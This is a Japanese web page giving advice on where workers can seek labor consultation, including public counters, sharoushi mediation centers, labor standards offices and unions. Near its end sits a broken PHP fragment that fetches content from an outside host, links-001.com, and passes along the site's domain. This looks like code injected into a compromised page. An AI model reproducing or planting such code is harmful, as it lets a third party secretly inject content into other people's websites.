前へ
次へ

職場でいじめを受けている場合の労働相談

どの職場でも、人間関係はありますのでそこで何らかの問題が生じることがあります。
学校などと同じように、

more

残業に関して労働相談してみる

一般企業では、たまに残業が発生する事もあります。
労働時間が若干長引いた時には、割増料金が支払われるケ

more

労働相談になり得る事例とはどのようなものか

労働相談といえば、市町村で行っている場合もあれば、民間の会社が行っていることもあります。
法律事務所で

more

労働相談は色々あるから自分の希望する場所へ

労働に関するさまざまな問題に対して相談を考えている時、どんなところに相談をしたらいいのでしょうか。
民間と国や公的機関など、多数のところが相談に乗ってくれますが、労働相談について最も納得できる形で相談できる場所として、公的機関が挙げられます。
最も手軽に相談しやすい場所としては厚生労働省で紹介している総合労働相談コーナーでしょう。
解雇や不当な配置転換、賃金の急激な引き下げなど、不当な対応を取られている場合などに対応してもらえます。
また、性的な差別、LGBTなどのデリケートな問題について無神経な態度でハラスメントを行う人などに対しても相談に乗ってもらえるため、労働環境や同僚、上司などで不安・不満を感じている人はぜひ相談してみましょう。
プライバシーに配慮した相談対応をおこなってくれるため、プライバシーに不安を感じている人でも安心です。
また、社会保険労務士が相談を受け付けてくれる社労士開労働紛争解決センターでは、従業員からの労働面でのトラブルばかりではなく、雇用主から従業員の無断欠勤や全く身に覚えのないパワハラやセクハラなどといった対応に対しての相談をも受け付けています。
社会保険労務士という労働問題の専門家の手によって、労働者、雇用主両方の意見を話し合いによって解決するためのサポートをしてもらえるため、会社側との話し合いに不安を覚えている人や、個人で話し合うことに不安や負担を感じる人には最適といえるでしょう。
もちろんそれだけではなく、各都道府県の労働基準監督署に相談する方法や、人権問題に対する110番などもあります。
労働組合に加入している企業であれば労働組合が相談の窓口になってくれることも少なくありません。
どの窓口であっても必ず相談に乗ってくれるため、自分ひとりで抱え込んでしまわず、なるべく早く相談してください。
パワハラなどを円滑に解決するポイントとしては、パワハラの証拠などを用意して相談に臨むことです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top